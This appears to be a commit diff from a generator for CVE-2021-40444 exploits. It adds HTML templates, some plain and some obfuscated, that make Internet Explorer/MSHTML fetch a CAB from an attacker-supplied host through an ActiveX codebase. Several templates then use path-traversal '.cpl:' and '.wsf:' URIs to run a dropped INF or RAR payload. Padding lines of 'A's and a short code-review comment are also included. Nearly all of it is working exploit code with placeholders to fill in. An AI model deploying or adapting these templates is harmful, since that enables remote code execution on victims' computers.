// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
function dropIframe() {
var i = document.createElement("iframe");
i.src = ".cpl:../../../AppData/Local/Temp/<INF_CHANGE_HERE>";
document.documentElement.appendChild(i);
}
function downloadCAB(){
var obj = document.createElement("object");
obj.setAttribute("codebase", '<HOST_CHANGE_HERE>#version=5,0,0,0');
obj.setAttribute("classid", 'CLSID:edbc374c-5730-432a-b5b8-de94f0b57217');
}
downloadCAB();
setTimeout(function(){ dropIframe(); }, 3000);
</script>
</body>
</html>
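Review bot: the 47 comment lines of `A`s at the top of the script have no explanation in the file, so they look like leftover junk; add a one-line comment stating that they are size padding (presumably for the minimum HTML size the README in this same commit describes, though the README attributes that limit to the Word preview and this template is the IE-only variant, so say which case applies). Also in this file: `<html lang="en">` plus `<meta charset="UTF-8">` are fine, but the `<title>` is the bare CVE identifier, which differs from the other templates in the set; keep titles consistent across templates so the generator's output is easy to recognise.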

template/original.html → template/cab-orig-obfuscated.html (renamed, 0 lines changed)

template/cab-uri-debobfuscated1.html (69 lines changed)

@ -0,0 +1,69 @@
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Expires" content="-1">
<meta http-equiv="X-UA-Compatible" content="IE=11">
</head>
<body>
<script>
function garbage() {
return 'garbage';
}
(function exploit() {
var iframe = window["Document"]['prototype']['createElement']['call'](window["document"], 'iframe');
try {
window["HTMLElement"]["prototype"]["appendChild"]['call'](window["document"]['body'], iframe);
} catch (_0x1ab454) {
window["HTMLElement"]["prototype"]["appendChild"]['call'](window["document"]['documentElement'], iframe);
}
var htmlfile = iframe['contentWindow']['ActiveXObject'], htmlfile2 = new htmlfile('htmlfile');
iframe['contentDocument']['open']()['close']();
try {
window["HTMLElement"]["prototype"]["removeChild"]['call'](window["document"]['body'], iframe);
} catch (_0x3b004e) {
window["HTMLElement"]["prototype"]["removeChild"]['call'](window["document"]['documentElement'], iframe);
}
htmlfile2['open']()['close']();
var htmlfile3 = new htmlfile2[('Script')]['ActiveXObject']('htmlfile');
htmlfile3['open']()['close']();
var htmlfile4 = new htmlfile3[('Script')]['ActiveXObject']('htmlfile');
htmlfile4['open']()['close']();
var htmlfile5 = new htmlfile4[('Script')]['ActiveXObject']('htmlfile');
htmlfile5['open']()['close']();
var ActiveXObjectVAR = new ActiveXObject('htmlfile')
, ActiveXObjectVAR2 = new ActiveXObject('htmlfile')
, ActiveXObjectVAR3 = new ActiveXObject('htmlfile')
, ActiveXObjectVAR4 = new ActiveXObject('htmlfile')
, ActiveXObjectVAR5 = new ActiveXObject('htmlfile')
, ActiveXObjectVAR6 = new ActiveXObject('htmlfile')
, XMLHttpR = new window['XMLHttpRequest']()
, XMLHttpRopen = window['XMLHttpRequest']['prototype']['open']
, XMLHttpRsend = window['XMLHttpRequest']['prototype']['send'];
XMLHttpRopen['call'](XMLHttpR, 'GET', '<HOST_CHANGE_HERE>', ![]),
XMLHttpRsend['call'](XMLHttpR),
htmlfile5['Script']['document']['write']('body>');
var htmlScript = window["Document"]['prototype']['createElement']['call'](htmlfile5['Script']['document'], 'object');
htmlScript['setAttribute']('codebase', '<HOST_CHANGE_HERE>#version=5,0,0,0');
htmlScript['setAttribute']('CLSID:edbc374c-5730-432a-b5b8-de94f0b57217'),
window["HTMLElement"]["prototype"]["appendChild"]['call'](htmlfile5['Script']['document']['body'], htmlScript),
ActiveXObjectVAR['Script']['location'] = '<URI_SCHEME_HERE>:123?<URI_SCHEME_HERE>',
ActiveXObjectVAR['Script']['location'] = '<URI_SCHEME_HERE>:123?<URI_SCHEME_HERE>',
ActiveXObjectVAR['Script']['location'] = '<URI_SCHEME_HERE>:123?<URI_SCHEME_HERE>',
ActiveXObjectVAR['Script']['location'] = '<URI_SCHEME_HERE>:123?<URI_SCHEME_HERE>',
ActiveXObjectVAR['Script']['location'] = '<URI_SCHEME_HERE>:123?<URI_SCHEME_HERE>',
ActiveXObjectVAR['Script']['location'] = '<URI_SCHEME_HERE>:123?<URI_SCHEME_HERE>',
ActiveXObjectVAR['Script']['location'] = '<URI_SCHEME_HERE>:123?<URI_SCHEME_HERE>',
ActiveXObjectVAR['Script']['location'] = '<URI_SCHEME_HERE>:123?<URI_SCHEME_HERE>',
ActiveXObjectVAR['Script']['location'] = '<URI_SCHEME_HERE>:123?<URI_SCHEME_HERE>',
ActiveXObjectVAR['Script']['location'] = '<URI_SCHEME_HERE>:../../../AppData/Local/Temp/Low/<INF_CHANGE_HERE>?<URI_SCHEME_HERE>',
ActiveXObjectVAR2['Script']['location'] = '<URI_SCHEME_HERE>:../../../AppData/Local/Temp/<INF_CHANGE_HERE>?<URI_SCHEME_HERE>',
ActiveXObjectVAR3['Script']['location'] = '<URI_SCHEME_HERE>:../../../../AppData/Local/Temp/Low/<INF_CHANGE_HERE>?<URI_SCHEME_HERE>',
ActiveXObjectVAR4['Script']['location'] = '<URI_SCHEME_HERE>:../../../../AppData/Local/Temp/<INF_CHANGE_HERE>?<URI_SCHEME_HERE>',
ActiveXObjectVAR5['Script']['location'] = '<URI_SCHEME_HERE>:../../../../../Temp/Low/<INF_CHANGE_HERE>?<URI_SCHEME_HERE>',
ActiveXObjectVAR4['Script']['location'] = '<URI_SCHEME_HERE>:../../../../../Temp/<INF_CHANGE_HERE>?<URI_SCHEME_HERE>',
ActiveXObjectVAR4['Script']['location'] = '<URI_SCHEME_HERE>:../../Low/<INF_CHANGE_HERE>?<URI_SCHEME_HERE>',
ActiveXObjectVAR4['Script']['location'] = '<URI_SCHEME_HERE>:../../<INF_CHANGE_HERE>?<URI_SCHEME_HERE>';
}());
</script>
</body>
</html>

146
template/cab-uri-debobfuscated2.html

@ -0,0 +1,146 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta http-equiv="Expires" content="-1">
<meta http-equiv="X-UA-Compatible" content="IE=11">
<title>CVE-2021-40444</title>
</head>
<body>
<script>
'use strict';
/** @type {!Array} */
var tokensArray = ["123", "365952KMsRQT", "tiveX", "/Lo", "./../../", "contentDocument", "ppD", "Dat", "close", "Acti", "removeChild", "mlF", "write", "./A", "ata/", "ile", "../", "body", "setAttribute", "#version=5,0,0,0", "ssi", "iframe", "748708rfmUTk", "documentElement", "lFile", "location", "159708hBVRtu", "a/Lo", "Script", "document", "call", "contentWindow", "emp", "Document", "Obj", "prototype", "lfi", "bject", "send", "appendChild", "Low/<INF_CHANGE_HERE>?<URI_SCHEME_HERE>", "htmlfile", "115924pLbIpw", "GET",
"p/<INF_CHANGE_HERE>?<URI_SCHEME_HERE>", "1109sMoXXX", "./../A", "htm", "l/T", "cal/", "1wzQpCO", "ect", "w/<INF_CHANGE_HERE>?<URI_SCHEME_HERE>", "522415dmiRUA", "<HOST_CHANGE_HERE>", "88320wWglcB", "XMLHttpRequest", "<INF_CHANGE_HERE>?<URI_SCHEME_HERE>", "Act", "D:edbc374c-5730-432a-b5b8-de94f0b57217", "open", "<bo", "HTMLElement", "/..", "veXO", "102FePAWC"];
/**
* @param {number} totalExpectedResults
* @param {?} entrySelector
* @return {?}
*/
function getValue(totalExpectedResults, entrySelector) {
return getValue = function(state, value) {
/** @type {number} */
state = state - 170;
var processorState = tokensArray[state];
return processorState;
}, getValue(totalExpectedResults, entrySelector);
}
(function(data, oldPassword) {
/** @type {function(number, ?): ?} */
var toMonths = getValue;
for (; !![];) {
try {
/** @type {number} */
var userPsd = parseInt(toMonths(206)) + parseInt(toMonths(216)) * parseInt(toMonths(196)) + parseInt(toMonths(201)) * -parseInt(toMonths(173)) + parseInt(toMonths(177)) + parseInt(toMonths(204)) + -parseInt(toMonths(193)) + parseInt(toMonths(218));
if (userPsd === oldPassword) {
break;
} else {
data["push"](data["shift"]());
}
} catch (_0x34af1e) {
data["push"](data["shift"]());
}
}
})(tokensArray, 384881), function() {
/**
* @return {?}
*/
function token_dash_lineno() {
/** @type {function(number, ?): ?} */
var addedRelations = currentRelations;
return addedRelations(205);
}
/** @type {function(number, ?): ?} */
var currentRelations = getValue;
/** @type {!Window} */
var global = window;
var document = global["document"];
var then = global["Document"]["prototype"]["createElement"];
var writeFunction = global["Document"]["prototype"]["write"];
var PL$22 = global["HTMLElement"]["prototype"]["appendChild"];
var $ = global["HTMLElement"]["prototype"]["removeChild"];
var el = then["call"](document, "iframe");
try {
PL$22["call"](document["body"], el);
} catch (_0x1ab454) {
PL$22["call"](document["documentElement"], el);
}
var ACTIVEX = el["contentWindow"]["ActiveXObject"];
var model = new ACTIVEX("htmlfile");
el["contentDocument"]["open"]()["close"]();
/** @type {string} */
var colname = "p";
try {
$["call"](document["body"], el);
} catch (_0x3b004e) {
$["call"](document["documentElement"], el);
}
model["open"]()["close"]();
var ops = new model["Script"]["Act" + "iveX" + "Obj" + "ect"]("htmlFile");
ops["open"]()["close"]();
/** @type {string} */
var _ = "c";
var TokenType = new ops["Script"]["Ac" + "tiveX" + "Object"]("htmlFile");
TokenType["open"]()["close"]();
var view = new TokenType["Script"]["Acti" + "veXO" + "bject"]("htmlFile");
view["open"]()["close"]();
var iedom = new ActiveXObject("htmlfile");
var rp_test = new ActiveXObject("htmlfile");
var htmlfile = new ActiveXObject("htmlfile");
var fake = new ActiveXObject("htmlfile");
var doc = new ActiveXObject("htmlfile");
var a = new ActiveXObject("htmlfile");
var Object = global["XMLHttpRequest"];
var args = new Object;
var ast = Object["prototype"]["open"];
var callbacks = Object["prototype"]["send"];
var modelIns = global["setTimeout"];
ast["call"](args, "GET", token_dash_lineno(), ![]);
callbacks["call"](args);
view["Script"]["document"]["write"]("<body>");
var s = then["call"](view["Script"]["document"], "object");
s["setAttribute"]("codebase", token_dash_lineno() + "#version=5,0,0,0");
/** @type {string} */
var i = "l";
s["setAttribute"]("classid", "CLSID:edbc374c-5730-432a-b5b8-de94f0b57217");
PL$22["call"](view["Script"]["document"]["body"], s);
/** @type {string} */
iedom["Script"]["location"] = "<URI_SCHEME_HERE>" + ":123?<URI_SCHEME_HERE>";
/** @type {string} */
iedom["Script"]["location"] = "<URI_SCHEME_HERE>" + ":123?<URI_SCHEME_HERE>";
/** @type {string} */
iedom["Script"]["location"] = "<URI_SCHEME_HERE>" + ":123?<URI_SCHEME_HERE>";
/** @type {string} */
iedom["Script"]["location"] = "<URI_SCHEME_HERE>" + ":123?<URI_SCHEME_HERE>";
/** @type {string} */
iedom["Script"]["location"] = "<URI_SCHEME_HERE>" + ":123?<URI_SCHEME_HERE>";
/** @type {string} */
iedom["Script"]["location"] = "<URI_SCHEME_HERE>" + ":123?<URI_SCHEME_HERE>";
/** @type {string} */
iedom["Script"]["location"] = "<URI_SCHEME_HERE>" + ":123?<URI_SCHEME_HERE>";
/** @type {string} */
iedom["Script"]["location"] = "<URI_SCHEME_HERE>" + ":123?<URI_SCHEME_HERE>";
/** @type {string} */
iedom["Script"]["location"] = "<URI_SCHEME_HERE>" + ":123?<URI_SCHEME_HERE>";
/** @type {string} */
iedom["Script"]["location"] = "<URI_SCHEME_HERE>" + ":../../../AppData/Local/Temp/Low/<INF_CHANGE_HERE>?<URI_SCHEME_HERE>";
/** @type {string} */
rp_test["Script"]["location"] = "<URI_SCHEME_HERE>" + ":../../../AppData/Local/Temp/<INF_CHANGE_HERE>?<URI_SCHEME_HERE>";
/** @type {string} */
htmlfile["Script"]["location"] = "<URI_SCHEME_HERE>" + ":../../../../AppData/Local/Temp/Low/<INF_CHANGE_HERE>?<URI_SCHEME_HERE>";
/** @type {string} */
fake["Script"]["location"] = "<URI_SCHEME_HERE>" + ":../../../../AppData/Local/Temp/<INF_CHANGE_HERE>?<URI_SCHEME_HERE>";
/** @type {string} */
doc["Script"]["location"] = "<URI_SCHEME_HERE>" + ":../../../../../Temp/Low/<INF_CHANGE_HERE>?<URI_SCHEME_HERE>";
/** @type {string} */
fake["Script"]["location"] = "<URI_SCHEME_HERE>" + ":../../../../../Temp/<INF_CHANGE_HERE>?<URI_SCHEME_HERE>";
/** @type {string} */
fake["Script"]["location"] = "<URI_SCHEME_HERE>" + ":../../Low/<INF_CHANGE_HERE>?<URI_SCHEME_HERE>";
/** @type {string} */
fake["Script"]["location"] = "<URI_SCHEME_HERE>" + ":../../<INF_CHANGE_HERE>?<URI_SCHEME_HERE>";
}();
</script>
</body>
</html>

3
template/cab-uri-obfuscated.html

File diff suppressed because one or more lines are too long

75
template/cab-uri-sample1.html

@ -0,0 +1,75 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta http-equiv="Expires" content="-1">
<meta http-equiv="X-UA-Compatible" content="IE=11">
<title>CVE-2021-40444</title>
</head>
<body>
<script>
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
var obj = document.createElement("object");
obj.setAttribute("codebase", '<HOST_CHANGE_HERE>#version=5,0,0,0');
obj.setAttribute("classid", 'CLSID:edbc374c-5730-432a-b5b8-de94f0b57217');
var i = document.createElement("iframe");
document.documentElement.appendChild(i);
i.src = ".cpl:../../../AppData/Local/Temp/<INF_CHANGE_HERE>";
i = document.createElement("iframe");
document.documentElement.appendChild(i);
i.src = "<URI_SCHEME_HERE>:../../../AppData/Local/Temp/<INF_CHANGE_HERE>?<URI_SCHEME_HERE>";
</script>
</body>
</html>

13
template/cab-uri-test-obfuscated.html

File diff suppressed because one or more lines are too long

68
template/cabless-rar-sample1.html

@ -0,0 +1,68 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>CVE-2021-40444 (Cab-less)</title>
</head>
<body>
<!--Cab-less exploitation by Edu_Braun_0day-->
<script>
new ActiveXObject('htmlfile').Script.location = '.wsf:../../../Downloads/<RAR_CHANGE_HERE>?.wsf';
var i = document.createElement("iframe");
document.documentElement.appendChild(i);
i.src = '.wsf:../../../Downloads/<RAR_CHANGE_HERE>?.wsf';
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
